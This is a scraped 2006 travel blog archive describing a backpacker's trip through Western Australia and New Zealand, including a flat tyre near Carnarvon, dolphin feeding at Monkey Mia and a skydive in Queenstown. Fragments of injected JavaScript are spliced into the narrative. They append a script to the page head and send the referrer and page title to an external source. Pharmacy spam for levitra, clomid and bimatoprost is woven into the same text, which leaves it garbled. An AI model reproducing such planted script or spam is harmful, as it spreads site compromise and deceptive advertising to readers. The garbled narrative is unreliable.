Kim and I joining Duncan and Dominic at their trip up north. We had same plans and Kim does not have a Greyhound ticket as I do. It seem to be a fun time. On the way up north out of a sudden there is a big bang – one of our tires popped. Lucky that the guys knew about cars and that this accident happened only a few hundred meters out of Carnarven. Unfortunately there was no proper spare tire and no jack in the back. The guys were too exited when they had bought the car and forgot to check everything. But today is Sunday and so no shop is opened where you can buy new tires. We had to stay overnight at a caravan park.d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s); cost of levitra at cvs 360
Archive for 2006
Feeding dolphins and watching dugongs
In Denham I shared a room with Kim from Holland. We came along quite well and so we decided to go together today to Monkey Mia for feeding the wild dolphins. Monkey Mia is famous for its dolphins who come every morning for picking up some fish. I insisted to feed them and meanwhile Kim did the photo of me feeding the dolphins. After that we did a catamaran tour for 2 hours for seeing the rare dugong. Oh that tour was beautiful even it was a little chilly sometimes. As well we met Duncan and Dominic. They were british and had bought a van so after the catamaran trip we joined them on their drive to “Eagles Bluff” a nature reserve for watching the sharks from above.
Horse Ranch: Big River Ranch
weird unfriendly guy, went to backpacker, liked it there clomid cost } else {s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Left to Kalbarri
Working at the horse ranch? bimatoprost }}
The pinnacle desert near Cervantes
Greyhound to Cervantes came about 1hour late.
The church of the Good Shepherd at Lake Tekapu
Kawarau bridge bungy
Skydive in Queenstown
My first skydive in Queenstown, New Zealand. Read the rest of this entry »